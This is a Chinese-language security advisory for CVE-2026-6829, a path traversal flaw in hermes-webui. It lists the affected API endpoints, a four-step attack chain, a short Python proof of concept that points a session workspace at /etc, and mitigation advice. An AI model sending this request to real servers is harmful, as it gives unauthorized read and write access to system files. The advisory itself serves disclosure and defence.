CVE-2026-6829 CVSS 6.3 中危

CVE-2026-6829: Hermes-webui 任意目录访问漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6829

漏洞类型

路径遍历

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

nesquena hermes-webui

漏洞概述

nesquena hermes-webui存在信任边界失效漏洞。经过身份验证的攻击者可以通过操作/api/session/new等端点中的工作区路径参数，将会话工作区设置为磁盘上任意现有目录。攻击者随后可利用此漏洞绕过预期的安全边界，在hermes-webui进程权限范围内，读取或修改受信任根目录之外的敏感文件。

技术细节

该漏洞的核心在于应用程序未能严格验证用户提交的工作区路径参数，导致信任边界失效。受影响的API端点包括/api/session/new、/api/session/update、/api/chat/start以及/api/workspaces/add。攻击者通过发送特制的HTTP POST请求，将参数中的路径修改为系统中的任意绝对路径（例如/etc/、/var/www/等）。一旦服务端接受该参数并将会话上下文重新指向该恶意目录，攻击者即可利用应用程序原本提供的常规文件读写API，访问或修改指定目录下的文件。由于应用程序运行时携带特定的系统权限，此攻击可能导致敏感配置文件泄露、系统关键数据被篡改等严重后果，且所有操作均在合法的会话上下文中进行，难以被常规WAF检测。

攻击链分析

STEP 1

步骤1: 身份认证

攻击者使用低权限账户登录nesquena hermes-webui系统。

STEP 2

步骤2: 路径遍历攻击

攻击者向/api/session/new等接口发送请求，通过修改workspace参数将其指向系统敏感目录（如/etc）。

STEP 3

步骤3: 绑定工作区

服务器未进行充分验证，将会话工作区绑定到攻击者指定的任意目录。

STEP 4

步骤4: 未授权文件操作

攻击者利用常规的文件读写API，在新的工作区路径下读取敏感数据或写入恶意文件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit for CVE-2026-6829: Arbitrary Workspace Directory Access
# This script demonstrates how to change the workspace to an arbitrary directory.

target_url = "http://target-host:port/api/session/new"
headers = {"Content-Type": "application/json"}

# Malicious payload pointing to a sensitive directory (e.g., /etc)
payload = {
    "workspace": "/etc"
}

try:
    # Send request to hijack the workspace path
    response = requests.post(target_url, json=payload, headers=headers)

    if response.status_code == 200:
        print("[+] Successfully redirected workspace to /etc")
        print("[+] You can now use file read/write APIs to access files in /etc")
    else:
        print("[-] Exploit failed. Status code:", response.status_code)
        print("[-] Response:", response.text)
except Exception as e:
    print("[-] An error occurred:", str(e))

影响范围

nesquena hermes-webui < v0.50.34

防御指南

临时缓解措施

如果无法立即升级，建议在网络层面限制对受影响API端点的访问来源IP，并密切监控日志中是否存在异常的目录访问请求或敏感文件读写行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表